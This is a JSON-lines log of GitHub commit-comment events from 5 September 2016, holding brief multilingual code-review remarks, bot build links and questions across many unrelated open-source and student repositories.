{"id":"4516657144","type":"CommitCommentEvent","actor":{"login":"Ankitsrist"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":18899514,"position":null,"line":null,"path":null,"commit_id":"3154cc05f4b848138d557f923d32a1d3fe7468d6","created_at":"2016-09-05T12:27:11Z","updated_at":"2016-09-05T12:27:11Z","body":"gg"}},"created_at":"2016-09-05T12:27:11Z"}
{"id":"4516659132","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"vlouzada/EDL"},"payload":{"comment":{"id":18899517,"position":null,"line":null,"path":null,"commit_id":"0a615dd2b62cb036d73df54075061f629f4bf57c","created_at":"2016-09-05T12:27:42Z","updated_at":"2016-09-05T12:27:42Z","body":"move o código e imagem para o diretório `trabalhos/trabalho-02/`"}},"created_at":"2016-09-05T12:27:42Z"}
{"id":"4516660116","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18899519,"position":null,"line":null,"path":null,"commit_id":"33f1e2d92f38f95ca6429a05e42382493fb1757e","created_at":"2016-09-05T12:27:57Z","updated_at":"2016-09-05T12:27:57Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/383/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1957)."}},"created_at":"2016-09-05T12:27:57Z"}
{"id":"4516660510","type":"CommitCommentEvent","actor":{"login":"TomyLobo"},"repo":{"name":"elastic/kibana"},"payload":{"comment":{"id":18899520,"position":17,"line":17,"path":"tasks/build/package_scripts/post_install.sh","commit_id":"523892c3e9b514709820b3f3fc766b2f0824f778","created_at":"2016-09-05T12:28:02Z","updated_at":"2016-09-05T12:28:02Z","body":"The group is never created here. This breaks upgrade from 4.5.3 to 4.5.4 at least on SLES11.\r\nIf this worked for you, you got lucky, since useradd is not guaranteed to create a group by the same name on all RPM-based distros."}},"created_at":"2016-09-05T12:28:02Z"}
{"id":"4516661220","type":"CommitCommentEvent","actor":{"login":"agatamalec"},"repo":{"name":"kamurod/WAR_FRO_W_05_Exam_JavaScript-kopia-nie-pushowac-"},"payload":{"comment":{"id":18899521,"position":8,"line":8,"path":"js/zadanie05.js","commit_id":"f4a1941903ffbdd6ca3204a81558f199c967e835","created_at":"2016-09-05T12:28:14Z","updated_at":"2016-09-05T12:28:14Z","body":"tutaj miałeś ustawic tekst na divie nie na przycisku , ej ej miało być idealnie :no_good: "}},"created_at":"2016-09-05T12:28:14Z"}
{"id":"4516667720","type":"CommitCommentEvent","actor":{"login":"papajoker"},"repo":{"name":"excalibur1234/pacli-simple"},"payload":{"comment":{"id":18899537,"position":null,"line":null,"path":null,"commit_id":"fc0dac1f311669a29b77769ea6c13d6304d53373","created_at":"2016-09-05T12:29:51Z","updated_at":"2016-09-05T12:29:51Z","body":"use directory/* not work with fzf but you can write :\r\n\r\n    local file\r\n    if [[ -e /etc/sysctl.d ]]; then\r\n        for file in /etc/sysctl.d/*; do\r\n            echo \"$file - Configure kernel parameters at runtime in multiple files.\">> /tmp/pacli-conf\r\n        done\r\n    fi\r\n    unset file"}},"created_at":"2016-09-05T12:29:51Z"}
{"id":"4516672927","type":"CommitCommentEvent","actor":{"login":"agatamalec"},"repo":{"name":"kamurod/WAR_FRO_W_05_Exam_JavaScript-kopia-nie-pushowac-"},"payload":{"comment":{"id":18899546,"position":34,"line":34,"path":"js/zadanie06.js","commit_id":"f4a1941903ffbdd6ca3204a81558f199c967e835","created_at":"2016-09-05T12:31:09Z","updated_at":"2016-09-05T12:31:09Z","body":"błedy ! w consoli - do poprawy to zadanie "}},"created_at":"2016-09-05T12:31:09Z"}
{"id":"4516674141","type":"CommitCommentEvent","actor":{"login":"tarekkh"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18899547,"position":346,"line":576,"path":"service/mcs/persistent/src/main/java/eu/europeana/cloud/service/mcs/persistent/cassandra/CassandraDataSetDAO.java","commit_id":"9f3ce055de608d0aaa5673291790404b437bcd0e","created_at":"2016-09-05T12:31:26Z","updated_at":"2016-09-05T12:31:26Z","body":"This method is extremely long and complicated ,  could you please refactor it ! .\r\nFor long method code smell , Here are some suggesions :\r\nhttps://sourcemaking.com/refactoring/smells/long-method \r\nNote : You can always check its Cyclomatic Complexity ."}},"created_at":"2016-09-05T12:31:26Z"}
{"id":"4516675874","type":"CommitCommentEvent","actor":{"login":"2633105854"},"repo":{"name":"2633105854/lsq"},"payload":{"comment":{"id":18899553,"position":null,"line":null,"path":null,"commit_id":"bd7ef4059c3d7abd5f75f407a59ed3532c3c27a5","created_at":"2016-09-05T12:31:54Z","updated_at":"2016-09-05T12:31:54Z","body":"撒谎年初"}},"created_at":"2016-09-05T12:31:54Z"}
{"id":"4516676622","type":"CommitCommentEvent","actor":{"login":"tarekkh"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18899558,"position":372,"line":602,"path":"service/mcs/persistent/src/main/java/eu/europeana/cloud/service/mcs/persistent/cassandra/CassandraDataSetDAO.java","commit_id":"9f3ce055de608d0aaa5673291790404b437bcd0e","created_at":"2016-09-05T12:32:04Z","updated_at":"2016-09-05T12:32:04Z","body":"could you name the counters other names than i ,and counter because this could be confusing ."}},"created_at":"2016-09-05T12:32:04Z"}
{"id":"4516677446","type":"CommitCommentEvent","actor":{"login":"tarekkh"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18899559,"position":373,"line":603,"path":"service/mcs/persistent/src/main/java/eu/europeana/cloud/service/mcs/persistent/cassandra/CassandraDataSetDAO.java","commit_id":"9f3ce055de608d0aaa5673291790404b437bcd0e","created_at":"2016-09-05T12:32:17Z","updated_at":"2016-09-05T12:32:17Z","body":"This is hard to follow, understand and debug since it has three different counters in 7 lines of code."}},"created_at":"2016-09-05T12:32:17Z"}
{"id":"4516677954","type":"CommitCommentEvent","actor":{"login":"sserg91"},"repo":{"name":"viatsko/node-parser3"},"payload":{"comment":{"id":18899561,"position":16,"line":27,"path":"app.js","commit_id":"fb34d9c6e31c25965390bdefa2ffef49e31bdaa5","created_at":"2016-09-05T12:32:24Z","updated_at":"2016-09-05T12:32:24Z","body":"\r\n\r\n[2016_08_21.txt](https://github.com/viatsko/node-parser3/files/455048/2016_08_21.txt)\r\n"}},"created_at":"2016-09-05T12:32:24Z"}
{"id":"4516678317","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":18899563,"position":null,"line":null,"path":null,"commit_id":"ca82627719f9b89aa9e16f02ff2e711c9fd594c6","created_at":"2016-09-05T12:32:30Z","updated_at":"2016-09-05T12:32:30Z","body":"O trabalho está muito descritivo.\r\nFaltou uma avaliação crítica, por exemplo, como COBOL se compara em termos de *readability*, *writeability* e *expressiveness* a uma outra linguagem que você conheça bem. Seja objetivo e crítico."}},"created_at":"2016-09-05T12:32:30Z"}
{"id":"4516683089","type":"CommitCommentEvent","actor":{"login":"fontameise"},"repo":{"name":"WilliMono/QA-Tool"},"payload":{"comment":{"id":18899571,"position":null,"line":null,"path":null,"commit_id":"217538051aa042e65398fb014c7f50dd32bfa702","created_at":"2016-09-05T12:33:38Z","updated_at":"2016-09-05T12:33:38Z","body":"Hallo"}},"created_at":"2016-09-05T12:33:38Z"}
{"id":"4516684907","type":"CommitCommentEvent","actor":{"login":"gergelyke"},"repo":{"name":"TryGhost/Ghost"},"payload":{"comment":{"id":18899574,"position":null,"line":null,"path":null,"commit_id":"54559f24f95239740b8f988d48a08ea276f7b335","created_at":"2016-09-05T12:34:07Z","updated_at":"2016-09-05T12:34:07Z","body":"Hey,\r\nwhen will it be released?"}},"created_at":"2016-09-05T12:34:07Z"}
{"id":"4516693365","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"jpauli/php-src"},"payload":{"comment":{"id":18899602,"position":11,"line":2960,"path":"Zend/zend_compile.c","commit_id":"dc81327a6ce9ab33ff041988e11bb2b2ef55cb9b","created_at":"2016-09-05T12:36:09Z","updated_at":"2016-09-05T12:36:09Z","body":"This should probably set a BOOL?"}},"created_at":"2016-09-05T12:36:09Z"}
{"id":"4516694168","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"biacarvalho/EDL"},"payload":{"comment":{"id":18899604,"position":null,"line":null,"path":null,"commit_id":"d0629d11e2b1123c4927498865743193abce7c83","created_at":"2016-09-05T12:36:18Z","updated_at":"2016-09-05T12:36:18Z","body":"Sua estrutura de diretórios está confusa.\r\nFavor mover os arquivos de cada trabalho para o diretório correspondente, e.g., `trabalhos/trabalho-02/`.\r\nSobre o segundo trabalho, é para subir o código fonte (`main.lua`) e a imagem em separado. Não mandar arquivos `.doc` por favor."}},"created_at":"2016-09-05T12:36:18Z"}
{"id":"4516697852","type":"CommitCommentEvent","actor":{"login":"kirrg001"},"repo":{"name":"TryGhost/Ghost"},"payload":{"comment":{"id":18899616,"position":null,"line":null,"path":null,"commit_id":"54559f24f95239740b8f988d48a08ea276f7b335","created_at":"2016-09-05T12:37:10Z","updated_at":"2016-09-05T12:37:10Z","body":"Hey @gergelyke \r\nWe'll release it very soon, just working on some more important fixes for `0.10.1`.\r\nDid you had a chance to verify that the leak is fixed? (https://github.com/TryGhost/Ghost/pull/7291#issuecomment-243884239)"}},"created_at":"2016-09-05T12:37:10Z"}
{"id":"4516700879","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18899651,"position":null,"line":null,"path":null,"commit_id":"4832cd32a538430b3f2cced9a7469ee7730d955a","created_at":"2016-09-05T12:37:49Z","updated_at":"2016-09-05T12:37:49Z","body":"the payment \"-x\" is a bit weird but it works and it's useful :)"}},"created_at":"2016-09-05T12:37:49Z"}
{"id":"4516703007","type":"CommitCommentEvent","actor":{"login":"backpaper0"},"repo":{"name":"backpaper0/agolla"},"payload":{"comment":{"id":18899667,"position":null,"line":null,"path":null,"commit_id":"9428be751984713fb8358cba9cea896c69e87289","created_at":"2016-09-05T12:38:22Z","updated_at":"2016-09-05T12:38:22Z","body":"よし、コンセプト固めるかー！"}},"created_at":"2016-09-05T12:38:22Z"}
{"id":"4516703703","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18899668,"position":315,"line":315,"path":"huangyi/stocktaking/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-05T12:38:30Z","updated_at":"2016-09-05T12:38:30Z","body":"obj的变量名有点儿随意呀。"}},"created_at":"2016-09-05T12:38:30Z"}
{"id":"4516706027","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"lucascomp/EDL"},"payload":{"comment":{"id":18899675,"position":null,"line":null,"path":null,"commit_id":"f3bbf6356a1b90e236bbb658438a92917d6b97b8","created_at":"2016-09-05T12:39:07Z","updated_at":"2016-09-05T12:39:07Z","body":"Onde está a avaliação comparativa? Favor falar sobre *readability*, *writability*, e *expressiveness*.\r\nEm qual categoria o operador `?` se enquadra? Alguma outra categoria sem ser essas três?"}},"created_at":"2016-09-05T12:39:07Z"}
{"id":"4516710315","type":"CommitCommentEvent","actor":{"login":"papajoker"},"repo":{"name":"excalibur1234/pacli-simple"},"payload":{"comment":{"id":18899687,"position":null,"line":null,"path":null,"commit_id":"800c45797d7ff1a3afb3279d51cf6d95e994ef9e","created_at":"2016-09-05T12:40:11Z","updated_at":"2016-09-05T12:40:11Z","body":"if [ $file=\"/etc/sudoers\" ]\r\ndont work, i have always sudoer :("}},"created_at":"2016-09-05T12:40:11Z"}
{"id":"4516711624","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"CaioSaud/EDL"},"payload":{"comment":{"id":18899694,"position":null,"line":null,"path":null,"commit_id":"bc7924f1e414539a2c32f9e11471744a0715fa80","created_at":"2016-09-05T12:40:28Z","updated_at":"2016-09-05T12:40:28Z","body":"O que foi difícil?"}},"created_at":"2016-09-05T12:40:28Z"}
{"id":"4516711697","type":"CommitCommentEvent","actor":{"login":"simoghrissi"},"repo":{"name":"PhilJay/MPAndroidChart"},"payload":{"comment":{"id":18899693,"position":null,"line":null,"path":null,"commit_id":"02cf2c1b97ae6075a8fb234d3c2a20ff9b44bb70","created_at":"2016-09-05T12:40:28Z","updated_at":"2016-09-05T12:40:28Z","body":"Hello first of all i want to thank you for those amazing chart , my question is how to put values of piechart out of the chart"}},"created_at":"2016-09-05T12:40:28Z"}
{"id":"4516713049","type":"CommitCommentEvent","actor":{"login":"tarekkh"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18899699,"position":395,"line":625,"path":"service/mcs/persistent/src/main/java/eu/europeana/cloud/service/mcs/persistent/cassandra/CassandraDataSetDAO.java","commit_id":"9f3ce055de608d0aaa5673291790404b437bcd0e","created_at":"2016-09-05T12:40:49Z","updated_at":"2016-09-05T12:40:49Z","body":"Minors : could you extract constants like : 0.3 in : (resultsPerSlice * 0.3) , \"cloud_id\",\"revision_id\" into final variables and then use them ."}},"created_at":"2016-09-05T12:40:49Z"}
{"id":"4516717819","type":"CommitCommentEvent","actor":{"login":"napalmbeth"},"repo":{"name":"napalmbeth/hello-world"},"payload":{"comment":{"id":18899711,"position":2,"line":2,"path":"README.md","commit_id":"1be148569c230f9723f42bd08a4c7646a8a77a90","created_at":"2016-09-05T12:41:51Z","updated_at":"2016-09-05T12:41:51Z","body":"delete this line"}},"created_at":"2016-09-05T12:41:51Z"}
{"id":"4516720735","type":"CommitCommentEvent","actor":{"login":"ngaut"},"repo":{"name":"pingcap/tidb"},"payload":{"comment":{"id":18899720,"position":26,"line":419,"path":"plan/physical_plan_builder.go","commit_id":"daaf8b5cd6f34040d42d27f6cc2bcba3f8b3a25a","created_at":"2016-09-05T12:42:32Z","updated_at":"2016-09-05T12:42:32Z","body":"s/resultINfo/resultInfo/"}},"created_at":"2016-09-05T12:42:32Z"}
{"id":"4516724351","type":"CommitCommentEvent","actor":{"login":"gabhy09"},"repo":{"name":"genaromendezl/LenguajesAutomatas"},"payload":{"comment":{"id":18899736,"position":null,"line":null,"path":null,"commit_id":"b9e0ac4b0ee0849abc5a704a7a2d46b5ddd4fd49","created_at":"2016-09-05T12:43:24Z","updated_at":"2016-09-05T12:43:24Z","body":":)"}},"created_at":"2016-09-05T12:43:24Z"}
{"id":"4516725291","type":"CommitCommentEvent","actor":{"login":"michaelklishin"},"repo":{"name":"rabbitmq/rabbitmq-java-client"},"payload":{"comment":{"id":18899762,"position":4,"line":396,"path":"src/main/java/com/rabbitmq/client/impl/AMQConnection.java","commit_id":"98cfd3be41cd747d2fd7c21dd4c19ab7169a4121","created_at":"2016-09-05T12:43:36Z","updated_at":"2016-09-05T12:43:36Z","body":"Should we multiply by 1.05? ;)"}},"created_at":"2016-09-05T12:43:36Z"}
{"id":"4516726107","type":"CommitCommentEvent","actor":{"login":"drdhaval2785"},"repo":{"name":"funderburkjim/elispsanskrit"},"payload":{"comment":{"id":18899771,"position":null,"line":null,"path":null,"commit_id":"0c58e017fd8f260412ad6a238d116c8edaa1aa59","created_at":"2016-09-05T12:43:47Z","updated_at":"2016-09-05T12:43:47Z","body":"Not actually. It is a print error in the book from where I collected the AkusmIya list.\r\n\r\n![capture](https://cloud.githubusercontent.com/assets/5755132/18248182/6988c440-7394-11e6-81d5-ba0533969df7.png)\r\n"}},"created_at":"2016-09-05T12:43:47Z"}
{"id":"4516728754","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"rasantana/EDL"},"payload":{"comment":{"id":18899782,"position":null,"line":null,"path":null,"commit_id":"5ee6b61a5b8c5eef58f7031fc0e10a700d842a43","created_at":"2016-09-05T12:44:24Z","updated_at":"2016-09-05T12:44:24Z","body":"???\r\nPor quê o Carlos está submetendo o trabalho do Rodrigo?"}},"created_at":"2016-09-05T12:44:24Z"}
{"id":"4516739688","type":"CommitCommentEvent","actor":{"login":"ColonelMoutarde"},"repo":{"name":"jeedom/core"},"payload":{"comment":{"id":18899808,"position":null,"line":null,"path":null,"commit_id":"7bcb087a83da2cddc6366ea5f7b2e076f268e7c9","created_at":"2016-09-05T12:46:56Z","updated_at":"2016-09-05T12:46:56Z","body":"Etrange ! Mais comme php5.6 est la version courante, c'est normal que tu ai\nrejeté le PR :)\n\nCordialement,\nLuc SANCHEZ\n\n2016-09-05 14:25 GMT+02:00 Loïc <notifications@github.com>:\n\n> Pas que j'ai eu le soucis sur du php 5.6 ( pas présent en 7.0)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jeedom/core/commit/7bcb087a83da2cddc6366ea5f7b2e076f268e7c9#commitcomment-18899497>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEet4Ic-tzv_iFUQ8JlB4DGBzpp2bMrhks5qnAo-gaJpZM4J0-ol>\n> .\n>\n"}},"created_at":"2016-09-05T12:46:56Z"}
{"id":"4516741105","type":"CommitCommentEvent","actor":{"login":"gabhy09"},"repo":{"name":"genaromendezl/LenguajesAutomatas"},"payload":{"comment":{"id":18899815,"position":null,"line":null,"path":null,"commit_id":"41ab1019c134a8dce3c1a4c8b8fb8ab5f316c14a","created_at":"2016-09-05T12:47:16Z","updated_at":"2016-09-05T12:47:16Z","body":"(y)"}},"created_at":"2016-09-05T12:47:16Z"}
{"id":"4516742654","type":"CommitCommentEvent","actor":{"login":"gabhy09"},"repo":{"name":"genaromendezl/LenguajesAutomatas"},"payload":{"comment":{"id":18899817,"position":null,"line":null,"path":null,"commit_id":"41ab1019c134a8dce3c1a4c8b8fb8ab5f316c14a","created_at":"2016-09-05T12:47:38Z","updated_at":"2016-09-05T12:47:38Z","body":"+1"}},"created_at":"2016-09-05T12:47:38Z"}
{"id":"4516743629","type":"CommitCommentEvent","actor":{"login":"gabhy09"},"repo":{"name":"genaromendezl/LenguajesAutomatas"},"payload":{"comment":{"id":18899820,"position":null,"line":null,"path":null,"commit_id":"41ab1019c134a8dce3c1a4c8b8fb8ab5f316c14a","created_at":"2016-09-05T12:47:51Z","updated_at":"2016-09-05T12:47:51Z","body":":+1: "}},"created_at":"2016-09-05T12:47:51Z"}
{"id":"4516744190","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18899821,"position":null,"line":null,"path":null,"commit_id":"dcd23cf2327255d2579f1eda7457e79dfde4bc09","created_at":"2016-09-05T12:47:59Z","updated_at":"2016-09-05T12:47:59Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#UY0GKF8yTTyaDWsjuARWDg"}},"created_at":"2016-09-05T12:47:59Z"}
{"id":"4516747031","type":"CommitCommentEvent","actor":{"login":"davidwhogg"},"repo":{"name":"AnnieJumpCannon/RAVE"},"payload":{"comment":{"id":18899828,"position":null,"line":null,"path":null,"commit_id":"09f749d35d12a65d56a10b973bf0012f0942cc2f","created_at":"2016-09-05T12:48:40Z","updated_at":"2016-09-05T12:48:40Z","body":"Good! Ideally you return to these in the discussion at the end, as a platform for saying what would be different if you modify the assumptions and why the method is as it is. "}},"created_at":"2016-09-05T12:48:40Z"}
{"id":"4516748532","type":"CommitCommentEvent","actor":{"login":"kmokstad"},"repo":{"name":"OPM/IFEM"},"payload":{"comment":{"id":18899832,"position":15,"line":1005,"path":"src/ASM/ASMbase.C","commit_id":"33941e67f6ffd1924123b2a747b8de1a634e3de3","created_at":"2016-09-05T12:49:01Z","updated_at":"2016-09-05T12:49:01Z","body":"Burde vel for ordens skyld fortsatt sjekke at inod ikke er mindre enn 1 (slik det var før), eller vil jo idof=madof[inod-1] kunne være så mangt."}},"created_at":"2016-09-05T12:49:01Z"}
{"id":"4516748983","type":"CommitCommentEvent","actor":{"login":"heikkil"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18899834,"position":null,"line":null,"path":null,"commit_id":"bcf9f9abca0aa458ba018e0914112b4ec450ce82","created_at":"2016-09-05T12:49:08Z","updated_at":"2016-09-05T12:49:08Z","body":"Please leave the initial value of org-preview-html-mode as nil!\r\n\r\nI do not want to see an html preview of all my many org files on every save them and all the time. The HTML preview is useful only occasionally and on select files. For those situations, I prefer to turn the preview mode on manually.\r\n\r\nIf having this minor mode on all the time is really necessary, it is customary to provide a customisable variable for that, e.g. (setq org-preview-html-global-mode t).\r\n"}},"created_at":"2016-09-05T12:49:08Z"}
{"id":"4516749471","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18899837,"position":null,"line":null,"path":null,"commit_id":"aef10b87dd1aa7ce01ff344b0e720c4ee6985bb8","created_at":"2016-09-05T12:49:15Z","updated_at":"2016-09-05T12:49:15Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#XHeje58cSueOiIqcUOo_kA"}},"created_at":"2016-09-05T12:49:15Z"}
{"id":"4516753579","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":18899845,"position":null,"line":null,"path":null,"commit_id":"9584bb8d66d8e7a3e482c1a36ea0bf0c2dd97c82","created_at":"2016-09-05T12:50:12Z","updated_at":"2016-09-05T12:50:12Z","body":"👍 "}},"created_at":"2016-09-05T12:50:12Z"}
{"id":"4516753902","type":"CommitCommentEvent","actor":{"login":"astellingwerf"},"repo":{"name":"jhaverhals/AnalysisDashboard"},"payload":{"comment":{"id":18899847,"position":6,"line":97,"path":"app/jsonhandling/RunParser.java","commit_id":"26ff9ad4c0dbc0eec7438a0b20c6dfaa3fb3f9e8","created_at":"2016-09-05T12:50:16Z","updated_at":"2016-09-05T12:50:16Z","body":"It's not common practice in Java to have local variable names starting with capitals."}},"created_at":"2016-09-05T12:50:16Z"}
{"id":"4516754816","type":"CommitCommentEvent","actor":{"login":"wacky70"},"repo":{"name":"wacky70/razor"},"payload":{"comment":{"id":18899850,"position":null,"line":null,"path":null,"commit_id":"e21cac96deb69b8c23fda0a4d33acbeee4dc37e9","created_at":"2016-09-05T12:50:27Z","updated_at":"2016-09-05T12:50:27Z","body":"Readme deleted"}},"created_at":"2016-09-05T12:50:27Z"}
{"id":"4516756802","type":"CommitCommentEvent","actor":{"login":"zoic21"},"repo":{"name":"jeedom/core"},"payload":{"comment":{"id":18899859,"position":null,"line":null,"path":null,"commit_id":"7bcb087a83da2cddc6366ea5f7b2e076f268e7c9","created_at":"2016-09-05T12:50:57Z","updated_at":"2016-09-05T12:50:57Z","body":"Oui voilà pourquoi après ça ne semblait le gêner que sur googleFa (double authentification) mais j'ai préféré pas prendre de risque"}},"created_at":"2016-09-05T12:50:57Z"}
{"id":"4516758095","type":"CommitCommentEvent","actor":{"login":"triblondon"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18899863,"position":5,"line":23,"path":"fastly-config.vcl","commit_id":"773edd3121ef002ea2bea9137ac00cdba82dc08a","created_at":"2016-09-05T12:51:15Z","updated_at":"2016-09-05T12:51:15Z","body":"I put some info in the commit msg:\r\n\r\n> Equally elapsed_msec is actually pointless cos it's the processing time of the beacon request, not the polyfill one"}},"created_at":"2016-09-05T12:51:15Z"}
{"id":"4516760355","type":"CommitCommentEvent","actor":{"login":"franknoe"},"repo":{"name":"markovmodel/PyEMMA"},"payload":{"comment":{"id":18899869,"position":null,"line":null,"path":null,"commit_id":"70e59400200e9066d93ebca189b247496476e3be","created_at":"2016-09-05T12:51:48Z","updated_at":"2016-09-05T12:51:48Z","body":"I have a déjà vu. Didn't we have this already in another issue?"}},"created_at":"2016-09-05T12:51:48Z"}
{"id":"4516760521","type":"CommitCommentEvent","actor":{"login":"akva2"},"repo":{"name":"OPM/IFEM"},"payload":{"comment":{"id":18899873,"position":15,"line":1005,"path":"src/ASM/ASMbase.C","commit_id":"33941e67f6ffd1924123b2a747b8de1a634e3de3","created_at":"2016-09-05T12:51:51Z","updated_at":"2016-09-05T12:51:51Z","body":"kan vel gjøre det, men jeg tenkte at MLGN var gjennomsjekket allerede."}},"created_at":"2016-09-05T12:51:51Z"}
{"id":"4516761134","type":"CommitCommentEvent","actor":{"login":"triblondon"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18899877,"position":null,"line":null,"path":null,"commit_id":"773edd3121ef002ea2bea9137ac00cdba82dc08a","created_at":"2016-09-05T12:51:59Z","updated_at":"2016-09-05T12:51:59Z","body":"I don't know how they do that. Is there a guide?"}},"created_at":"2016-09-05T12:51:59Z"}
{"id":"4516761341","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"git-for-windows/build-extra"},"payload":{"comment":{"id":18899878,"position":null,"line":null,"path":null,"commit_id":"13fe48c4141e89a345ab8a6df126261eb0908741","created_at":"2016-09-05T12:52:02Z","updated_at":"2016-09-05T12:52:02Z","body":"@fourpastmidnight thank you for being so active here! It really helps!"}},"created_at":"2016-09-05T12:52:02Z"}
{"id":"4516762917","type":"CommitCommentEvent","actor":{"login":"azeier"},"repo":{"name":"HearthSim/Hearthstone-Deck-Tracker"},"payload":{"comment":{"id":18899881,"position":null,"line":null,"path":null,"commit_id":"a4f2379a745b154bb7b16c4f69e3049e1f8ffef7","created_at":"2016-09-05T12:52:22Z","updated_at":"2016-09-05T12:52:22Z","body":"The kara specific change? Yes.\r\nGeneral localization not, working on a bunch more right now."}},"created_at":"2016-09-05T12:52:22Z"}
{"id":"4516765001","type":"CommitCommentEvent","actor":{"login":"triblondon"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18899888,"position":5,"line":4,"path":"lib/rumTemplate.js.handlebars","commit_id":"fe65bc27602b18df5c1f7c339e3813db617dd657","created_at":"2016-09-05T12:52:53Z","updated_at":"2016-09-05T12:52:53Z","body":"no, it's a protocol-relative url, so it leaves out the `http:` or `https:`"}},"created_at":"2016-09-05T12:52:53Z"}
{"id":"4516765429","type":"CommitCommentEvent","actor":{"login":"astellingwerf"},"repo":{"name":"jhaverhals/AnalysisDashboard"},"payload":{"comment":{"id":18899890,"position":5,"line":97,"path":"app/jsonhandling/RunParser.java","commit_id":"5180ae43b8cbdcac470085fa99409de882052103","created_at":"2016-09-05T12:52:59Z","updated_at":"2016-09-05T12:52:59Z","body":"You could improve the readability by using `java.net.URLEncoder.encode('duration,empty,....')` instead."}},"created_at":"2016-09-05T12:52:59Z"}
{"id":"4516769607","type":"CommitCommentEvent","actor":{"login":"ocefpaf"},"repo":{"name":"astrofrog/staged-recipes"},"payload":{"comment":{"id":18899903,"position":25,"line":33,"path":"recipes/hyperion/meta.yaml","commit_id":"1f943051032a5e04634f743302f5c55276aa07e2","created_at":"2016-09-05T12:53:59Z","updated_at":"2016-09-05T12:53:59Z","body":"Even if you are not building on Windows now it is nice to \"future proof\" your recipe by adding the   `# [not win]` here too.\r\n\r\nPS: Note that if you do link against `libquadmath` this will be broken on `Linux` b/c `libgfortran` does not ship `libquadmath`. In that case you will need to use.\r\n\r\n```yaml\r\n- libgfortran  # [osx]\r\n- libgcc  # [linux]\r\n```\r\n\r\nI know this is horrible but..."}},"created_at":"2016-09-05T12:53:59Z"}
{"id":"4516772103","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18899912,"position":null,"line":null,"path":null,"commit_id":"57382fd16535b27e4a6bb070fc3f1b9068aa352f","created_at":"2016-09-05T12:54:32Z","updated_at":"2016-09-05T12:54:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 921](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12563&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-05T12:54:32Z"}
{"id":"4516774375","type":"CommitCommentEvent","actor":{"login":"mbmannubisht"},"repo":{"name":"dazza76/cdr"},"payload":{"comment":{"id":18899917,"position":null,"line":null,"path":null,"commit_id":"e14e5fffa5e79ce9307cf5807e584e20010a6fd2","created_at":"2016-09-05T12:55:04Z","updated_at":"2016-09-05T12:55:04Z","body":"Hi, \r\n\r\nHope you are doing well.\r\nIts working project ?\r\n\r\nDo you have any GUI based cdr viewer application for asterisk.\r\n\r\n"}},"created_at":"2016-09-05T12:55:04Z"}
{"id":"4516775861","type":"CommitCommentEvent","actor":{"login":"triblondon"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18899920,"position":13,"line":88,"path":"README.md","commit_id":"fe65bc27602b18df5c1f7c339e3813db617dd657","created_at":"2016-09-05T12:55:25Z","updated_at":"2016-09-05T12:55:25Z","body":"Done"}},"created_at":"2016-09-05T12:55:25Z"}
{"id":"4516777813","type":"CommitCommentEvent","actor":{"login":"alexbiehl"},"repo":{"name":"mrkkrp/text-metrics"},"payload":{"comment":{"id":18899924,"position":10,"line":82,"path":"cbits/text_metrics.c","commit_id":"1670bd495bb28666231391ac044a401fdbecde87","created_at":"2016-09-05T12:55:53Z","updated_at":"2016-09-05T12:55:53Z","body":"@mrkkrp by the way. Do you handle UTF-16 continuation bytes correctly? I see you are iterating over uint16 arrays only. "}},"created_at":"2016-09-05T12:55:53Z"}
